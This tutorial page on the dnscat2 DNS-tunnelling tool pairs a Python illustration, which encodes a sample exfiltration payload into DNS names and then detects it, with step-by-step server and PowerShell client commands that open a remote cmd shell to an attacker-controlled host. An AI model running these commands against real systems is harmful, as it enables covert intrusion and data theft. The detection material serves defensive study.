
Dnscat2

Dnscat2 tunnels data over DNS. The client on the target sends queries for subdomains of a domain the attacker controls; whatever local DNS server the target normally uses forwards those queries, resolver by resolver, to the attacker's dnscat2 server, which is authoritative for that domain. The two ends exchange data without ever connecting to each other directly.

The data travels inside what look like ordinary DNS queries and responses rather than over a separate connection. This makes dnscat2 hard to spot: outbound DNS is almost always allowed, and a firewall that terminates and inspects HTTPS never sees the tunnel, because nothing in it is HTTPS. Catching it means looking at the DNS traffic itself, for example at query volume and at unusually long subdomain labels under one domain.
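The following Python is an added illustration of the two points above and is not code from dnscat2 or from this page. It packs a payload into DNS names the way a tunnel has to (hex labels of at most 63 characters, names of at most 253 characters, under an attacker-controlled domain), reassembles it, and then runs a simple detector over a constructed query log that mixes benign lookups with the tunnelled names. The domain c2.example, the payload and the benign names are all made up; the real dnscat2 wire format additionally carries session IDs, sequence numbers and encryption, which are left out here.

```python
# Added example: simplified DNS-tunnel encoding plus a detector over DNS query
# names. Mimics the idea behind dnscat2 (hex data in subdomain labels of a
# domain the attacker controls) but is NOT the dnscat2 protocol. All domains
# and data below are constructed for the example.
from __future__ import annotations

import binascii
from collections import defaultdict

MAX_LABEL = 63   # RFC 1035: one label is at most 63 octets
MAX_NAME = 253   # practical maximum for a full domain name in text form


def encode_chunks(data: bytes, domain: str) -> list[str]:
    """Hex-encode data and pack it into as few DNS names as possible under domain.

    Each name is '<label>.<label>...<domain>' with every label <= 63 chars and
    the whole name <= 253 chars, the two limits any DNS tunnel must respect.
    """
    hexdata = binascii.hexlify(data).decode()
    budget = MAX_NAME - len(domain)   # chars left for the data labels and their dots
    if budget <= 1:
        raise ValueError("domain too long to carry any data")
    names, pos = [], 0
    while pos < len(hexdata):
        labels, used = [], 0
        while pos < len(hexdata):
            # room for one more label plus the dot that joins it to what follows
            take = min(MAX_LABEL, len(hexdata) - pos, budget - used - 1)
            if take <= 0:
                break
            labels.append(hexdata[pos:pos + take])
            pos += take
            used += take + 1
        names.append(".".join(labels + [domain]))
    return names


def decode_chunks(names: list[str], domain: str) -> bytes:
    """Reassemble the payload from names given in sending order.

    dnscat2 carries sequence numbers so the server can reorder queries; this
    toy version simply assumes the order is preserved.
    """
    suffix = "." + domain
    hexparts = []
    for name in names:
        if not name.endswith(suffix):
            raise ValueError(f"unexpected name: {name}")
        hexparts.append(name[:-len(suffix)].replace(".", ""))
    return binascii.unhexlify("".join(hexparts))


def base_domain(name: str) -> str:
    """Crude registered-domain guess: the last two labels (no public-suffix list)."""
    return ".".join(name.rstrip(".").split(".")[-2:])


def tunnel_candidates(query_log: list[str], min_unique: int = 5,
                      min_label: int = 30) -> dict[str, int]:
    """Return {base_domain: unique_name_count} for domains that look tunnelled.

    Two signals a DNS tunnel cannot avoid: many distinct names under one domain
    (every chunk needs a fresh, uncached name) and unusually long labels (to
    fit as much data per query as possible). Thresholds are illustrative.
    """
    names_per_base = defaultdict(set)
    longest = defaultdict(int)
    for name in query_log:
        base = base_domain(name)
        names_per_base[base].add(name)
        for label in name.split("."):
            longest[base] = max(longest[base], len(label))
    return {b: len(s) for b, s in names_per_base.items()
            if len(s) >= min_unique and longest[b] >= min_label}


# Constructed sample: a few benign lookups plus a tunnelled "exfiltration" of a
# made-up text blob under the made-up attacker domain c2.example.
BENIGN_QUERIES = ["www.google.com", "mail.google.com", "api.github.com",
                  "cdn.example.com", "login.microsoftonline.com"]
EXFIL_DOMAIN = "c2.example"
EXFIL_PAYLOAD = b"user=svc_backup\nhost=FILESRV01\n" * 20   # 620 bytes
TUNNEL_QUERIES = encode_chunks(EXFIL_PAYLOAD, EXFIL_DOMAIN)
SAMPLE_LOG = BENIGN_QUERIES + TUNNEL_QUERIES

if __name__ == "__main__":
    for n in TUNNEL_QUERIES[:2]:
        print(n)
    assert decode_chunks(TUNNEL_QUERIES, EXFIL_DOMAIN) == EXFIL_PAYLOAD
    print("flagged:", tunnel_candidates(SAMPLE_LOG))
```

Running it prints two 253-character query names and then flags only c2.example, with six distinct names under it; the five benign domains never reach the unique-name or label-length thresholds. In a real environment the same logic would run over resolver logs per time window, and the base-domain split would use a public-suffix list rather than the last two labels.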

To install dnscat2 on Kali, we can use the apt install dnscat2 command.

Once installed, we can use the following commands to start the server.

dnscat2-server <domain>
dnscat2-server --dns host=<Attacker IP>,port=<port>,domain=<domain>

Command breakdown:

  • --dns host=...,port=...,domain=... - Configure the DNS listener with the three settings below.
  • host=<Attacker IP> - IP address the server listens on (0.0.0.0 for all interfaces).
  • port=<port> - UDP port to listen on. When the target's queries arrive through its normal resolver this must be 53, and the domain's NS record must point at the attacker host.
  • domain=<domain> - Domain the server is authoritative for; the client sends its data as subdomains of it.

After starting, the server prints a pre-shared secret. The client must supply the same secret so that the session is authenticated and the data sent to the dnscat2 server is encrypted; without it, anyone who can see the DNS traffic can read the tunnel. As an example, the following runs the dnscat2 client on a Windows target using the PowerShell version.

https://github.com/lukebaggett/dnscat2-powershell

Once downloaded, we can use the following PowerShell command to import the module.

Import-Module .\dnscat2.ps1

Once imported, we can use the following command to start the client.

Start-Dnscat2 -DNSserver <Attacker IP> -Domain <domain> -PreSharedSecret <secret key> -Exec cmd

Command breakdown:

  • -DNSserver <Attacker IP> - Send the queries to this DNS server instead of the system resolver; point it at the attacker's server (or at any resolver that can reach it).
  • -Domain <domain> - Specify the domain the dnscat2 server is authoritative for, the same value passed to the server.
  • -PreSharedSecret <secret key> - Specify the secret printed when the server started.
  • -Exec cmd - Start cmd.exe and attach its input and output to the tunnel, giving the server a shell once the session is established.

Alternatively, the server prints ready-made client command lines, with the domain and secret already filled in, when it starts; those can be copied to the target directly.

Once the client connects, a new session appears on the server. Typing a question mark (?) lists the commands available there; windows lists the open sessions, and window -i 1 interacts with the first one, i.e. the shell started on the target.